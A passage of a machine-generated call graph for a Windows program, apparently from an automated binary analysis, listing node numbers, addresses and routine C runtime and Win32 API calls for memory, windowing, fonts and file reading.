137340->137322 137341->137328 137360 b032ad LeaveCriticalSection 137342->137360 137344 b04d67 137344->137333 137346 af59b6 137345->137346 137347 af59b3 InterlockedIncrement 137345->137347 137348 af59c3 137346->137348 137349 af59c0 InterlockedIncrement 137346->137349 137347->137346 137350 af59cd InterlockedIncrement 137348->137350 137351 af59d0 137348->137351 137349->137348 137350->137351 137360->137344 137362->137257 137363->137254 137364->137255 137366 b113bc _realloc 137365->137366 137367 b113f3 _memset 137366->137367 137368 b113d4 137366->137368 137371 b113e9 _realloc 137367->137371 137373 b11465 RtlAllocateHeap 137367->137373 137375 b0339f __lock 66 API calls 137367->137375 137380 b0410c 5 API calls 2 library calls 137367->137380 137381 b114ac LeaveCriticalSection _doexit 137367->137381 137382 b05437 6 API calls __decode_pointer 137367->137382 137378 af98d1 67 API calls __getptd_noexit 137368->137378 137370 b113d9 137379 afa5b1 6 API calls 2 library calls 137370->137379 137371->137262 137373->137367 137375->137367 137378->137370 137380->137367 137381->137367 137382->137367 137383->137271 137526 ac5afa 137531 ac5894 137526->137531 137529 ac5b35 137530 ac5b13 MoveWindow 137530->137529 137532 a877af 18 API calls 137531->137532 137533 ac58a3 137532->137533 137534 ac58a7 SetLastError 137533->137534 137535 ac58b3 137533->137535 137537 ac58e0 137534->137537 137536 a89677 4 API calls 137535->137536 137538 ac58c2 CreateDialogParamW 137536->137538 137537->137529 137537->137530 137538->137537 137539 ae5637 137553 af5454 137539->137553 137541 ae5643 GetDC 137554 ae548f 137541->137554 137544 ae566e 137546 ae5697 137544->137546 137559 a7c8e0 137544->137559 137545 ae565e EnumFontFamiliesW 137545->137544 137548 a7c8e0 std::_String_base::_Xlen 69 API calls 137546->137548 137550 ae56aa 137546->137550 137548->137550 137549 ae56bd ReleaseDC CreateFontW 137552 ae56ed std::_Locinfo::~_Locinfo 137549->137552 137550->137549 137551 a7c8e0 std::_String_base::_Xlen 69 API calls 137550->137551 137551->137549 137553->137541 137566 af4550 137554->137566 137556 ae54ba GetVersionExW 137557 af4647 _strlwr_s_l_stat 5 API calls 137556->137557 137558 ae54e2 137557->137558 137558->137544 137558->137545 137560 a7c8f6 137559->137560 137561 a7c8e9 137559->137561 137569 a7cc80 69 API calls 3 library calls 137560->137569 137568 a7cc80 69 API calls 3 library calls 137561->137568 137563 a7c8f2 137563->137546 137565 a7c917 137565->137546 137567 af455c __VEC_memzero 137566->137567 137567->137556 137568->137563 137569->137565 137570 6c68df34 137572 6c68df3e 137570->137572 137573 6c68df58 137572->137573 137575 6c68df5a 137572->137575 137581 6c68d47e 137572->137581 137598 6c698420 6 API calls __decode_pointer 137572->137598 137576 6c68df68 std::bad_alloc::bad_alloc 137575->137576 137577 6c68df80 137575->137577 137599 6c68e46f 69 API calls __cinit 137576->137599 137600 6c5d870f 53 API calls std::exception::exception 137577->137600 137580 6c68df8a __CxxThrowException 137582 6c68d531 137581->137582 137588 6c68d490 137581->137588 137607 6c698420 6 API calls __decode_pointer 137582->137607 137584 6c68d537 137608 6c69464e 52 API calls __getptd_noexit 137584->137608 137587 6c68d529 137587->137572 137588->137587 137590 6c68d4ed RtlAllocateHeap 137588->137590 137591 6c68d4a1 137588->137591 137593 6c68d51d 137588->137593 137596 6c68d522 137588->137596 137604 6c698420 6 API calls __decode_pointer 137588->137604 137590->137588 137591->137588 137601 6c6983d8 52 API calls 2 library calls 137591->137601 137602 6c69822d 52 API calls 6 library calls 137591->137602 137603 6c69087f GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 137591->137603 137605 6c69464e 52 API calls __getptd_noexit 137593->137605 137606 6c69464e 52 API calls __getptd_noexit 137596->137606 137598->137572 137599->137577 137600->137580 137601->137591 137602->137591 137604->137588 137605->137596 137606->137587 137607->137584 137608->137587 137609 aff4b2 137610 aff4be _realloc 137609->137610 137611 aff4f6 137610->137611 137612 aff4d6 137610->137612 137614 aff4eb _realloc 137610->137614 137622 b0d28b 137611->137622 137637 af98d1 67 API calls __getptd_noexit 137612->137637 137616 aff4db 137638 afa5b1 6 API calls 2 library calls 137616->137638 137623 b0d29d 137622->137623 137624 b0d2bf EnterCriticalSection 137622->137624 137623->137624 137625 b0d2a5 137623->137625 137626 aff4fe 137624->137626 137627 b0339f __lock 67 API calls 137625->137627 137628 aff350 137626->137628 137627->137626 137629 aff362 137628->137629 137634 aff383 137628->137634 137630 aff36e 137629->137630 137629->137634 137636 aff3a1 _realloc 137629->137636 137646 af98d1 67 API calls __getptd_noexit 137630->137646 137632 aff373 137647 afa5b1 6 API calls 2 library calls 137632->137647 137639 aff52a LeaveCriticalSection LeaveCriticalSection _vprintf_helper 137634->137639 137636->137634 137640 b1158a 137636->137640 137637->137616 137639->137614 137641 b115ae 137640->137641 137642 b11599 137640->137642 137641->137636 137648 af98d1 67 API calls __getptd_noexit 137642->137648 137644 b1159e 137649 afa5b1 6 API calls 2 library calls 137644->137649 137646->137632 137648->137644 137650 6c5eae3f 137652 6c5eae4b __EH_prolog3 137650->137652 137651 6c5eae98 std::locale::_Init 137652->137651 137659 6c5ead48 _memset PathCombineW 137652->137659 137654 6c5eae67 137654->137651 137655 6c5eae6b 137654->137655 137662 6c5ea35f 69 API calls 2 library calls 137655->137662 137657 6c5eae82 137658 6c5d894f ctype InterlockedDecrement 137657->137658 137658->137651 137663 6c5eab57 137659->137663 137661 6c5ead96 137661->137654 137662->137657 137664 6c5eab63 __EH_prolog3 137663->137664 137665 6c5eab87 CreateXMLDOMDocument 137664->137665 137667 6c5eac0c std::locale::_Init 137664->137667 137665->137667 137672 6c5eab95 _com_util::ConvertStringToBSTR 137665->137672 137666 6c5eabcd VariantClear 137666->137667 137666->137672 137667->137661 137671 6c5d894f InterlockedDecrement ctype 137671->137672 137672->137666 137672->137667 137672->137671 137673 6c5ea0ab 14 API calls ctype 137672->137673 137674 6c5ea486 4 API calls 3 library calls 137672->137674 137675 6c5eaa89 78 API calls 137672->137675 137673->137672 137674->137672 137675->137672 137676 6c5e4cbd 137683 6c5e49e9 137676->137683 137679 6c5e4d05 137684 6c5e49fa EnterCriticalSection 137683->137684 137685 6c5e49f6 137683->137685 137686 6c5e4a16 GetCurrentThreadId 137684->137686 137687 6c5e4a1e 137684->137687 137685->137679 137689 6c5e442a 137685->137689 137686->137687 137696 6c5db57e 137687->137696 137690 6c5e4437 137689->137690 137691 6c5e4432 137689->137691 137694 6c5e444c SetWindowLongW 137690->137694 137715 6c5e43f7 GetCurrentProcess FlushInstructionCache 137690->137715 137699 6c68c60d 137691->137699 137695 6c5d846a CallWindowProcW 137694->137695 137695->137679 137697 6c5db587 LeaveCriticalSection 137696->137697 137698 6c5db593 137696->137698 137697->137698 137698->137685 137700 6c68c56d 137699->137700 137701 6c68c580 137700->137701 137702 6c68c577 137700->137702 137703 6c68c58a GetProcessHeap HeapAlloc 137701->137703 137704 6c68c5a1 RtlInterlockedPopEntrySList 137701->137704 137716 6c68c4a6 9 API calls 137702->137716 137707 6c68c59f 137703->137707 137708 6c68c5c3 137703->137708 137709 6c68c5ac VirtualAlloc 137704->137709 137713 6c68c608 137704->137713 137706 6c68c57c 137706->137701 137706->137708 137707->137690 137708->137690 137709->137708 137710 6c68c5c7 RtlInterlockedPopEntrySList 137709->137710 137711 6c68c5ec 137710->137711 137712 6c68c5dc VirtualFree 137710->137712 137714 6c68c5f4 RtlInterlockedPushEntrySList 137711->137714 137712->137713 137713->137690 137714->137713 137714->137714 137715->137694 137716->137706 137717 6c676a44 137718 6c676a57 137717->137718 137723 6c6767c7 137718->137723 137720 6c676a66 137721 6c5d894f ctype InterlockedDecrement 137720->137721 137722 6c676a70 137721->137722 137724 6c6767eb __EH_prolog3 _wcsncpy 137723->137724 137725 6c676818 PathRemoveFileSpecW 137724->137725 137727 6c676802 137724->137727 137766 6c5dac1f 137725->137766 137727->137720 137729 6c5d92da 3 API calls 137730 6c676844 CharUpperW 137729->137730 137731 6c676859 _wcscpy 137730->137731 137732 6c5dac1f ctype 3 API calls 137731->137732 137733 6c67687f 137732->137733 137771 6c5dabb9 137733->137771 137735 6c6769eb 137784 6c67676d 75 API calls ctype 137735->137784 137738 6c6768ef 137738->137735 137743 6c67692a 137738->137743 137739 6c6769e9 137742 6c5d894f ctype InterlockedDecrement 137739->137742 137740 6c676888 137740->137738 137741 6c690755 59 API calls __wcsnicmp 137740->137741 137746 6c6769a2 137740->137746 137779 6c674eab 6 API calls ctype 137740->137779 137741->137740 137744 6c676a0d 137742->137744 137780 6c5dc29c __CxxThrowException _memcpy_s lstrlenW InterlockedIncrement ctype 137743->137780 137747 6c5d894f ctype InterlockedDecrement 137744->137747 137748 6c5d894f ctype InterlockedDecrement 137746->137748 137749 6c676a15 137747->137749 137750 6c6769aa 137748->137750 137751 6c5d894f ctype InterlockedDecrement 137749->137751 137753 6c5d894f ctype InterlockedDecrement 137750->137753 137751->137727 137752 6c676932 137754 6c676977 137752->137754 137756 6c5d894f ctype InterlockedDecrement 137752->137756 137755 6c6769b2 137753->137755 137757 6c676981 137754->137757 137758 6c6769bf 137754->137758 137759 6c5d894f ctype InterlockedDecrement 137755->137759 137756->137754 137781 6c66ed61 6 API calls ctype 137757->137781 137782 6c66ed61 6 API calls ctype 137758->137782 137759->137727 137762 6c67698a 137783 6c676703 75 API calls ctype 137762->137783 137764 6c6769dd 137765 6c5d894f ctype InterlockedDecrement 137764->137765 137765->137739 137767 6c5dac2f lstrlenW 137766->137767 137768 6c5dac2b 137766->137768 137767->137768 137785 6c5da427 137768->137785 137772 6c5dabc9 137771->137772 137773 6c5dabeb 137771->137773 137774 6c5dabe0 137772->137774 137775 6c5dabed 137772->137775 137773->137740 137776 6c5da427 ctype 2 API calls 137774->137776 137777 6c5d8ad1 InterlockedDecrement 137775->137777 137776->137773 137778 6c5dabf4 InterlockedIncrement 137777->137778 137778->137773 137779->137740 137780->137752 137781->137762 137782->137762 137783->137764 137784->137739 137786 6c5da435 137785->137786 137787 6c5da44d 137786->137787 137789 6c5d7783 __CxxThrowException _memcpy_s ctype 137786->137789 137787->137729 137789->137787 137790 ad2c88 137793 ad292f 137790->137793 137792 ad2cac 137794 ad293b __EH_prolog3 137793->137794 137795 ad2986 137794->137795 137796 ad2956 137794->137796 137824 ad297e std::_Locinfo::~_Locinfo 137794->137824 137797 ad298e 137795->137797 137798 ad29ab 137795->137798 138018 ace0a6 25 API calls 2 library calls 137796->138018 137865 ad1dad 137797->137865 137799 ad2ac4 137798->137799 137802 ad29ca 137798->137802 137803 ad29c1 137798->137803 137800 ad2aeb 137799->137800 137801 ad2ad2 137799->137801 137808 ad2af4 137800->137808 137828 ad2b06 137800->137828 138029 ad2773 392 API calls 4 library calls 137801->138029 137809 ad29dd 137802->137809 137810 ad29d4 137802->137810 138019 ad1a27 359 API calls 4 library calls 137803->138019 138030 ace3c7 14 API calls 137808->138030 137811 ad29e7 137809->137811 137812 ad29f0 137809->137812 138020 acc9ed 178 API calls 137810->138020 138021 ad08b4 152 API calls 137811->138021 137817 ad29fa 137812->137817 137818 ad2a06 137812->137818 137813 ad29c8 137813->137824 138022 ad118b 131 API calls 5 library calls 137817->138022 137820 ad2a1c 137818->137820 137821 ad2a10 137818->137821 137826 ad2a26 137820->137826 137827 ad2a32 137820->137827 138023 acf299 223 API calls 4 library calls 137821->138023 137822 ad2b73 137822->137824 137832 ad2b9f 137822->137832 137833 ad2bb4 137822->137833 137823 ad296c 137823->137824 138044 aceb65 26 API calls 137823->138044 137824->137792 138024 acf30c 223 API calls 4 library calls 137826->138024 137829 ad2a3c 137827->137829 137830 ad2a48 137827->137830 137828->137822 138031 acd8c2 GetDlgCtrlID SetBkColor 137828->138031 138025 aceac6 117 API calls 4 library calls 137829->138025 137836 ad2a5e 137830->137836 137837 ad2a52 137830->137837 138032 ad2566 130 API calls 5 library calls 137832->138032 137839 ad2bbd 137833->137839 137840 ad2bd2 137833->137840 137843 ad2a68 137836->137843 137844 ad2a74 137836->137844 138026 acfeb8 213 API calls 4 library calls 137837->138026 138033 ad15fd 118 API calls 4 library calls 137839->138033 137846 ad2bfd ctype 137840->137846 138034 a7ba90 137840->138034 138027 ad18f7 161 API calls 4 library calls 137843->138027 137850 ad2a7e 137844->137850 137861 ad2a94 137844->137861 137847 ad2c19 137846->137847 137848 ad2c45 137846->137848 138041 acd1cb GetDlgItem GetWindowRect PostMessageW 137847->138041 137848->137823 137855 ad2c4e 137848->137855 138028 acd85a 6 API calls 137850->138028 138043 ad1c10 387 API calls 137855->138043 137856 ad2c2f 137856->137823 137859 ad2c39 137856->137859 137858 ad2c27 137858->137856 138042 ad1416 89 API calls 137859->138042 137861->137856 137967 acff5c 137861->137967 137863 ad2c5d 137863->137823 137866 ad1dd1 __EH_prolog3 137865->137866 138045 a8b9b4 137866->138045 137868 ad1dda 137869 ad1de1 GetClientRect 137868->137869 138051 ab72a6 137869->138051 137968 acff80 __EH_prolog3 137967->137968 137969 acff92 GetDlgItem 137968->137969 138000 ad01dd ctype 137968->138000 137971 acffad _memset 137969->137971 137969->138000 137970 af4647 _strlwr_s_l_stat 5 API calls 137972 ad020b 137970->137972 137973 acffc2 GetWindowTextW 137971->137973 137972->137799 137974 a7ba90 std::_String_base::_Xlen 2 API calls 137973->137974 137975 acffe5 IsWindowVisible 137974->137975 137976 a7b680 78 API calls 137975->137976 137977 ad0000 137976->137977 138858 a87fa1 137977->138858 138000->137970 138018->137823 138019->137813 138020->137824 138021->137824 138022->137813 138023->137824 138024->137824 138025->137824 138026->137824 138027->137824 138028->137813 138029->137824 138030->137824 138031->137822 138032->137813 138033->137824 138035 a7baa5 138034->138035 138036 a7ba9b 138034->138036 138038 a8cc03 138035->138038 139465 a7dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 138036->139465 139466 a8c9e1 138038->139466 138041->137858 138042->137813 138043->137863 138044->137824 138046 a8b9c0 __EH_prolog3 138045->138046 138047 a8b9eb std::_Locinfo::~_Locinfo 138046->138047 138287 ae51d2 86 API calls 3 library calls 138046->138287 138047->137868 138049 a8b9e1 138288 af4f89 74 API calls _AtModuleExit 138049->138288 138052 ab72ca __EH_prolog3 138051->138052 138053 a7ba90 std::_String_base::_Xlen 2 API calls 138052->138053 138054 ab72d8 _memset 138053->138054 138289 af3480 138054->138289 138057 a7ba90 std::_String_base::_Xlen 2 API calls 138058 ab730b 138057->138058 138301 a7bf10 138058->138301 138287->138049 138288->138047 138292 af34a1 _memset 138289->138292 138299 af352a 138289->138299 138290 af4647 _strlwr_s_l_stat 5 API calls 138291 ab7302 138290->138291 138291->138057 138292->138299 138324 af32c0 138292->138324 138294 af34d7 _memset 138295 af34e3 lstrlenA 138294->138295 138296 af3502 _strlwr_s_l_stat 138295->138296 138297 af34fe 138295->138297 138350 a7e520 MultiByteToWideChar 138296->138350 138351 ab6dcf 138297->138351 138299->138290 138475 a7da70 138301->138475 138325 af32ca 138324->138325 138326 af3427 138325->138326 138355 af2f80 138325->138355 138327 af4647 _strlwr_s_l_stat 5 API calls 138326->138327 138329 af3437 138327->138329 138329->138294 138330 af32ff _memset 138330->138326 138367 af2ed0 71 API calls 138330->138367 138332 af3329 138368 af2210 138332->138368 138350->138297 138352 ab6dda 138351->138352 138356 af30fd 138355->138356 138357 af2fa4 _memset 138355->138357 138358 af4647 _strlwr_s_l_stat 5 API calls 138356->138358 138357->138356 138360 af2fd1 SHGetValueA 138357->138360 138359 af310e 138358->138359 138359->138330 138360->138356 138361 af3003 _memset 138360->138361 138361->138356 138362 af2050 77 API calls 138361->138362 138363 af30bc lstrcmpiA 138362->138363 138363->138356 138364 af30d6 138363->138364 138365 af4647 _strlwr_s_l_stat 5 API calls 138364->138365 138367->138332 138484 aef9af EnterCriticalSection 138475->138484 138479 a7da81 138485 aef9ef LeaveCriticalSection 138484->138485 138486 aef9cc 138484->138486 138488 aef9f8 138485->138488 138486->138485 138487 aef9d0 138486->138487 138489 aef9d4 LeaveCriticalSection 138487->138489 138493 aef8ce RaiseException 138487->138493 138488->138479 138489->138488 138493->138489 138859 a87fa8 138858->138859 138860 a87fb2 138858->138860 138908 a7dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 138859->138908 138862 af4c33 __wcsicoll 79 API calls 138860->138862 138863 a87fbe ShowWindow 138862->138863 138908->138860 139465->138035 139467 a8c9f8 139466->139467 139468 a8c9ee 139466->139468 139478 af6bfe 139467->139478 139484 a7dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 139468->139484 139472 a7cf00 std::_String_base::_Xlen 69 API calls 139473 a8ca0f 139472->139473 139481 af6e46 139473->139481 139476 a7cf30 2 API calls 139477 a8ca2a 139476->139477 139477->137846 139485 af6ba7 139478->139485 139493 af6dbb 139481->139493 139484->139467 139486 af6bb7 139485->139486 139490 a8ca03 139485->139490 139491 af98d1 67 API calls __getptd_noexit 139486->139491 139488 af6bbc 139492 afa5b1 6 API calls 2 library calls 139488->139492 139490->139472 139491->139488 139494 af6dc8 139493->139494 139495 af6de5 139493->139495 139506 af98d1 67 API calls __getptd_noexit 139494->139506 139496 af6df2 139495->139496 139502 af6dff 139495->139502 139508 af98d1 67 API calls __getptd_noexit 139496->139508 139499 af6dcd 139507 afa5b1 6 API calls 2 library calls 139499->139507 139501 af6df7 139510 afa5b1 6 API calls 2 library calls 139501->139510 139503 a8ca1f 139502->139503 139509 af98d1 67 API calls __getptd_noexit 139502->139509 139503->139476 139506->139499 139508->139501 139509->139501 139511 a7e300 139514 a7e230 139511->139514 139513 a7e32e 139515 a7e240 _memset 139514->139515 139524 a72770 CreateFileW 139515->139524 139517 a7e2ab 139518 a7e2e1 139517->139518 139521 a7e2bf 139517->139521 139519 af4647 _strlwr_s_l_stat 5 API calls 139518->139519 139520 a7e2f2 139519->139520 139520->139513 139522 af4647 _strlwr_s_l_stat 5 API calls 139521->139522 139523 a7e2dd 139522->139523 139523->139513 139525 a727b5 139524->139525 139526 a72791 139524->139526 139533 a72860 139525->139533 139579 a78150 92 API calls 139526->139579 139528 a727c5 139530 a727d7 CloseHandle 139528->139530 139531 a727cd CloseHandle 139528->139531 139530->139517 139531->139517 139532 a727ae 139532->139517 139534 a728b8 _memset 139533->139534 139535 af5674 _malloc 67 API calls 139534->139535 139537 a728f1 139534->139537 139536 a729ba 139535->139536 139538 a729c3 SetLastError 139536->139538 139539 a729cb 139536->139539 139543 a7299d 139537->139543 139580 a75690 139537->139580 139538->139539 139539->139537 139542 a729d7 139539->139542 139540 a72b39 139544 a72b4a 139540->139544 139549 af49fc _realloc 67 API calls 139540->139549 139605 a78150 92 API calls 139542->139605 139543->139540 139548 af49fc _realloc 67 API calls 139543->139548 139545 af4647 _strlwr_s_l_stat 5 API calls 139544->139545 139550 a72b60 139545->139550 139546 a7291e 139546->139543 139594 a710a0 139546->139594 139548->139540 139549->139544 139550->139528 139553 a729f0 139606 a71000 96 API calls _strlwr_s_l_stat 139553->139606 139554 a7295e 139597 a71f60 139554->139597 139557 a72a02 139557->139543 139558 a72a53 139557->139558 139559 a72a18 139557->139559 139608 a75a40 97 API calls 139558->139608 139607 a71ea0 98 API calls _strlwr_s_l_stat 139559->139607 139562 a72977 139563 a72c39 139562->139563 139565 af49fc _realloc 67 API calls 139562->139565 139566 af49fc _realloc 67 API calls 139563->139566 139564 a7296c 139564->139543 139564->139562 139565->139563 139570 a72af7 139570->139562 139609 a71c80 98 API calls _strlwr_s_l_stat 139570->139609 139571 a72a67 139571->139543 139571->139562 139571->139570 139610 a71ac0 120 API calls 3 library calls 139571->139610 139574 a72b1c 139574->139543 139579->139532 139581 af5674 _malloc 67 API calls 139580->139581 139582 a756a1 139581->139582 139583 a756d2 139582->139583 139584 a756ac SetLastError 139582->139584 139613 a74680 139583->139613 139676 a78150 92 API calls 139584->139676 139587 a756c5 139587->139546 139588 a757fd 139588->139546 139589 af49fc _realloc 67 API calls 139591 a757f0 139589->139591 139590 a756f3 139590->139588 139592 a757d4 139590->139592 139663 a74cb0 139590->139663 139591->139546 139592->139589 139708 a75b50 GetFileSizeEx 139594->139708 139596 a710cc 139596->139543 139596->139553 139596->139554 139598 a71fd9 139597->139598 139604 a71ff7 139598->139604 139721 a71e00 139598->139721 139599 af4647 _strlwr_s_l_stat 5 API calls 139601 a720b5 139599->139601 139601->139564 139604->139599 139605->139543 139606->139557 139607->139564 139608->139571 139609->139574 139610->139570 139614 af4550 _memset 139613->139614 139615 a746a6 GetFileSizeEx 139614->139615 139616 a746d6 139615->139616 139617 a746bd 139615->139617 139619 af5674 _malloc 67 API calls 139616->139619 139677 a78150 92 API calls 139617->139677 139620 a746e8 139619->139620 139621 a746f1 SetLastError 139620->139621 139622 a746f9 139620->139622 139621->139622 139624 a74701 139622->139624 139625 a7471a 139622->139625 139623 a74b7e 139628 a74b8f 139623->139628 139630 af49fc _realloc 67 API calls 139623->139630 139678 a78150 92 API calls 139624->139678 139679 a74410 139625->139679 139627 af49fc _realloc 67 API calls 139627->139623 139628->139590 139630->139628 139631 a74728 139632 a74410 95 API calls 139631->139632 139662 a746ce 139631->139662 139633 a7475b 139632->139633 139634 a7479e 139633->139634 139636 a74410 95 API calls 139633->139636 139633->139662 139635 a74410 95 API calls 139634->139635 139634->139662 139637 a747cd 139635->139637 139636->139634 139637->139662 139662->139623 139662->139627 139664 a74cd9 SetFilePointerEx 139663->139664 139666 a74d04 ReadFile 139664->139666 139667 a74da2 139664->139667 139666->139667 139669 a74d21 139666->139669 139707 a78150 92 API calls 139667->139707 139670 a74d2c 139669->139670 139671 a74d8d SetFilePointerEx 139669->139671 139672 af4647 _strlwr_s_l_stat 5 API calls 139670->139672 139671->139667 139673 a74dba 139671->139673 139674 a74df1 139672->139674 139675 a73e90 93 API calls 139673->139675 139674->139590 139675->139670 139676->139587 139677->139662 139678->139662 139680 a74460 _realloc 139679->139680 139681 a74569 SetFilePointerEx 139680->139681 139682 a7446c _realloc 139680->139682 139685 a745ee SetFilePointerEx 139680->139685 139683 a74580 139681->139683 139684 a7459f 139681->139684 139682->139631 139700 a78150 92 API calls 139683->139700 139701 a73e90 ReadFile 139684->139701 139685->139683 139687 a74635 139685->139687 139690 a73e90 93 API calls 139687->139690 139692 a745ae _realloc 139690->139692 139691 a74593 139691->139631 139692->139631 139700->139691 139702 a73ea5 139701->139702 139704 a73ebd 139701->139704 139706 a78150 92 API calls 139702->139706 139704->139692 139705 a73eb6 139705->139692 139706->139705 139707->139670 139709 a75b7a 139708->139709 139710 a75b98 139708->139710 139719 a78150 92 API calls 139709->139719 139712 a75be4 139710->139712 139714 a75bc0 SetFilePointerEx 139710->139714 139712->139596 139713 a75b8b 139713->139596 139715 a75bd3 139714->139715 139716 a75bf1 139714->139716 139720 a78150 92 API calls 139715->139720 139718 a73e90 93 API calls 139716->139718 139718->139712 139719->139713 139720->139712 139731 a75fe0 139721->139731 139732 a75ffd 139731->139732 139733 af5674 _malloc 67 API calls 139732->139733 139734 a760c4 139733->139734 139735 a760f5 _realloc 139734->139735 139736 a760cf SetLastError 139734->139736 139757 ab3f03 139758 ab3f25 139757->139758 139769 ac2322 139758->139769 139760 ab3f68 GetWindowLongW 139773 ab3ee0 CallWindowProcW 139760->139773 139761 ab3f55 139772 ab3ee0 CallWindowProcW 139761->139772 139764 ab3f87 139765 ab3f63 139764->139765 139766 ab3f95 GetWindowLongW 139764->139766 139766->139765 139767 ab3fa2 SetWindowLongW 139766->139767 139767->139765 139774 ac2167 139769->139774 139771 ab3f47 139771->139760 139771->139761 139771->139765 139772->139765 139773->139764 139775 ac2179 139774->139775 139795 ac219a 139774->139795 139776 ac21b6 139775->139776 139777 ac2181 139775->139777 139778 ac21dc 139776->139778 139779 ac21bd 139776->139779 139804 ac20a9 139777->139804 139780 ac21f1 139778->139780 139781 ac21e3 139778->139781 139839 ac1458 IsWindow IsWindowVisible PostMessageW InvalidateRect 139779->139839 139782 ac21f8 139780->139782 139783 ac2217 139780->139783 139830 ac1513 IsWindow 139781->139830 139834 ac14af IsWindow 139782->139834 139786 ac221e 139783->139786 139787 ac2240 139783->139787 139840 ac156b InvalidateRect 139786->139840 139790 ac2269 139787->139790 139791 ac2247 139787->139791 139788 ac21da 139788->139795 139793 ac2270 139790->139793 139794 ac2292 139790->139794 139841 ac1304 _TrackMouseEvent 139791->139841 139842 ac158c InvalidateRect 139793->139842 139799 ac22dc 139794->139799 139843 ac15b4 IsWindowEnabled LoadCursorW SetCursor 139794->139843 139795->139771 139802 ac22f9 139799->139802 139844 ac1894 InvalidateRect 139799->139844 139802->139795 139845 ac18a4 InvalidateRect 139802->139845 139805 ac20b8 __EH_prolog3_GS 139804->139805 139846 aa7451 139805->139846 139808 aa7323 4 API calls 139809 ac20f8 139808->139809 139849 ab6537 GetWindowRect 139809->139849 139812 ac2117 139814 ac2129 139812->139814 139815 ac2122 139812->139815 139813 ac2130 139816 ac213f 139813->139816 139817 ac2135 139813->139817 139864 ac1a42 139814->139864 139851 ac1f15 139815->139851 139821 ac2127 139816->139821 139879 ac1d08 139816->139879 139891 ac1b7b 84 API calls 4 library calls 139817->139891 139892 aa7395 DeleteObject BitBlt SelectObject DeleteDC ctype 139821->139892 139822 ac213d 139822->139821 139825 ac2157 139893 aa747c EndPaint 139825->139893 139827 ac215f 139828 af550d 5 API calls 139827->139828 139829 ac2164 139828->139829 139829->139795 139831 ac1554 InvalidateRect 139830->139831 139832 ac1535 PostMessageW 139830->139832 139833 ac1568 139831->139833 139832->139831 139833->139795 139835 ac14cd IsWindowEnabled 139834->139835 139836 ac14f9 InvalidateRect 139834->139836 139835->139836 139837 ac14da PostMessageW 139835->139837 139838 ac150f 139836->139838 139837->139836 139838->139795 139839->139788 139840->139795 139841->139795 139842->139795 139843->139794 139844->139802 139845->139795 139847 aa7469 BeginPaint 139846->139847 139848 aa7474 GetClientRect 139846->139848 139847->139848 139848->139808 139850 ab6560 139849->139850 139850->139812 139850->139813 139894 af5421 139851->139894 139853 ac1f21 IsWindowEnabled 139854 ac1f32 GetClientRect 139853->139854 139895 ac168e 139854->139895 139858 a7ba90 std::_String_base::_Xlen 2 API calls 139859 ac1f8c 139858->139859 139860 a7cf00 std::_String_base::_Xlen 69 API calls 139859->139860 139861 ac1f9d GetWindowTextW 139860->139861 139862 a8d354 2 API calls 139861->139862 139863 ac1fb2 ctype std::_Locinfo::~_Locinfo 139862->139863 139863->139821 139932 af5421 139864->139932 139866 ac1a4e IsWindowEnabled 139867 ac1a68 GetClientRect 139866->139867 139933 ac18c5 139867->139933 139870 ac1ab3 139871 a7ba90 std::_String_base::_Xlen 2 API calls 139870->139871 139872 ac1ac0 139871->139872 139873 a7cf00 std::_String_base::_Xlen 69 API calls 139872->139873 139874 ac1ad2 GetWindowTextW 139873->139874 139875 a8d354 2 API calls 139874->139875 139880 ac1d14 __EH_prolog3 139879->139880 139881 a7ba90 std::_String_base::_Xlen 2 API calls 139880->139881 139882 ac1d3a 139881->139882 139883 a7cf00 std::_String_base::_Xlen 69 API calls 139882->139883 139884 ac1d48 GetWindowTextW 139883->139884 139885 a8d354 2 API calls 139884->139885 139886 ac1d5e 139885->139886 139887 ac1d81 GetClientRect IsWindowEnabled 139886->139887 139888 ac1dd8 139887->139888 139889 ac1de4 OffsetRect 139888->139889 139890 ac1df2 ctype std::_Locinfo::~_Locinfo 139888->139890 139889->139890 139890->139821 139891->139822 139892->139825 139893->139827 139894->139853 139896 ac188d 139895->139896 139897 ac16a2 139895->139897 139896->139858 139897->139896 139898 ac16d5 OffsetRect 139897->139898 139916 ada606 139898->139916 139900 ac1717 139901 ada606 9 API calls 139900->139901 139902 ac1745 139901->139902 139917 ada614 139916->139917 139918 ada62a 139917->139918 139928 a9e185 GetDC 139917->139928 139918->139900 139920 ada686 CreateCompatibleDC SelectObject 139929 ada1f0 StretchBlt 139920->139929 139922 ada6c8 SelectObject 139928->139920 139929->139922 139932->139866 139935 ac18d1 __EH_prolog3 139933->139935 139934 ac1986 std::_Locinfo::~_Locinfo 139934->139870 139935->139934 139936 ac18fa GetClientRect 139935->139936 139937 ac1923 OffsetRect 139936->139937 139939 ada606 9 API calls 139937->139939 139939->139934 139940 6c5ee2b7 139941 6c5ee2c1 139940->139941 139942 6c5ee2ce 139941->139942 139943 6c5ee31d lstrlenW 139941->139943 139945 6c5ee2de FindFirstFileW 139942->139945 139943->139942 139944 6c5ee328 139943->139944 139945->139944 139946 6c5ee2f4 GetFullPathNameW 139945->139946 139947 6c5ee32c _wcsrchr _wcsrchr 139946->139947 139948 6c5ee30a 139946->139948 139947->139944 139949 6c5ee311 SetLastError 139948->139949 139949->139944 139950 6c60c24a 139951 6c60c257 139950->139951 139952 6c60c25c GetCurrentThreadId 139950->139952 139952->139951 139953 6c60c26b 139952->139953 139953->139951 139955 6c60bd5f 139953->139955 139956 6c60bd70 139955->139956 139959 6c5e4d0b 139956->139959 139960 6c5e442a 18 API calls 139959->139960 139961 6c5e4d1d 139960->139961 139962 6c5e4d21 SetLastError 139961->139962 139964 6c5e4d2d 139961->139964 139963 6c5e4d29 139962->139963 139963->139951 139964->139963 139968 6c5e4989 139964->139968 139969 6c5e49a8 139968->139969 139970 6c5e4999 RaiseException 139968->139970 139969->139970 139971 6c5e49b6 GetCurrentThreadId EnterCriticalSection 139969->139971 139970->139969 139972 6c5db57e LeaveCriticalSection 139971->139972 139973 6c5e49e3 CreateWindowExW 139972->139973 139973->139963 139974 acd207 139975 acd219 PostMessageW 139974->139975 139976 ab5e40 139977 ab5e64 139976->139977 139988 ab4fe4 139977->139988 139979 ab5ea7 GetWindowLongW 139992 ab5e24 CallWindowProcW 139979->139992 139980 ab5e94 139991 ab5e24 CallWindowProcW 139980->139991 139983 ab5ea2 139984 ab5ec6 